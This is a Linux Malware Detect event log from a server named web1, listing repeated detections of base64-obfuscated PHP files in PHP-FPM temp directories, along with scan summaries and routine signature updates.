Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf7c99bcb.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c563e1f1cc.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c879571f59.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccebe95da2.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf4a3e9b3.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c55d662d4f.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccef79c4dd.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae7869660.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cce402efa5.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd05704705.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae26d7fe5.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccf1d07a43.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cced286b2c.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c58b4d8ef5.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cadb141bf9.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccf0aa9f56.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c581649d38.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c87e09d207.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cb0c110290.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cad779c12c.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5acfe9a1a.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cce6a92e38.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0f20bd11.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8a27b8360.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccee5760cd.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c89dbc9442.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8d0e51fde.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cad93ee58b.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8bd149145.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5b11b9a77.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caeadd34d3.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf3039572.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5b539d591.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd092b96a3.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5b917ca6a.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae5d88832.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8b8d2b9c7.php
Jan 06 2026 04:02:00 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf1591526.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8d2c26f91.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0fcc0941.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf97278df.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae92cb425.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cb0962a6a5.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0a3582df.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8d429fe7a.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cb0ad0299a.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae41cd677.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cce5512e3f.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0694c8f7.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0b29f89a.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf7c99bcb.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c563e1f1cc.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c879571f59.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccebe95da2.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf4a3e9b3.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c55d662d4f.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccef79c4dd.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae7869660.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cce402efa5.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd05704705.php
Jan 06 2026 04:02:01 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae26d7fe5.php
Jan 06 2026 04:02:01 web1 maldet(657057): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 966, malware hits 100, cleaned hits 0, time 64s
Jan 06 2026 04:02:01 web1 maldet(657057): {scan} scan report saved, to view run: maldet --report 260106-0400.657057
Jan 06 2026 04:02:01 web1 maldet(657057): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260106-0400.657057
Jan 06 2026 08:55:03 web1 maldet(1167): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 07 2026 04:05:36 web1 maldet(306402): {update} checking for available updates...
Jan 07 2026 04:05:36 web1 maldet(306402): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 07 2026 04:05:36 web1 maldet(306402): {update} hashing install files and checking against server...
Jan 07 2026 04:05:36 web1 maldet(306402): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 07 2026 04:05:36 web1 maldet(306402): {update} latest version already installed.
Jan 07 2026 04:05:36 web1 maldet(306520): {sigup} performing signature update check...
Jan 07 2026 04:05:36 web1 maldet(306520): {sigup} local signature set is version 202601043906265
Jan 07 2026 04:05:36 web1 maldet(306520): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 07 2026 04:05:36 web1 maldet(306520): {sigup} new signature set 20260107676235 available
Jan 07 2026 04:05:36 web1 maldet(306520): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} verified md5sum of maldet-clean.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} unpacked and installed maldet-clean.tgz
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} signature set update completed
Jan 07 2026 04:05:37 web1 maldet(306520): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 07 2026 04:05:37 web1 maldet(306726): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 07 2026 04:05:38 web1 maldet(306726): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 07 2026 04:05:38 web1 maldet(306726): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 07 2026 04:05:38 web1 maldet(306726): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 07 2026 04:05:38 web1 maldet(306726): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 07 2026 04:06:15 web1 maldet(306726): {scan} file list completed in 37s, found 5518 files...
Jan 07 2026 04:06:15 web1 maldet(306726): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 07 2026 04:06:15 web1 maldet(306726): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (5518 files) in progress...
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df7cd54ab2.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d52a72eaa3.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd55a2c045.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db58cc67cc.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d528fcc71d.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e1732627ac.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df825577e3.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db62b86978.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d95b1b0eeb.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df6640d68b.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd782aee0e.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51be17767.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e17235fd53.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e182f3d727.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd4ff95574.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51b6de651.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df655ef7a2.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df7b4a4d8e.php
Jan 07 2026 04:07:06 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d72b29a9f3.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd5a808e5a.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd78b4f716.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d34f8274ca.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51e44de52.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e18cf30d42.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d735448795.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51ff6c7b6.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd57aeabc3.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db580a55e0.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d30e700898.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d95a79210b.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db4485b0e1.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51eb3577a.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e184bce350.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd653885ee.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db42c53b76.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d72ce3339b.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d94bc26be5.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd59883756.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d94d38f874.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db47fe09c7.php
Jan 07 2026 04:07:07 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db663595a4.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd56bce937.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d95bb3d41a.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d734e20da3.php
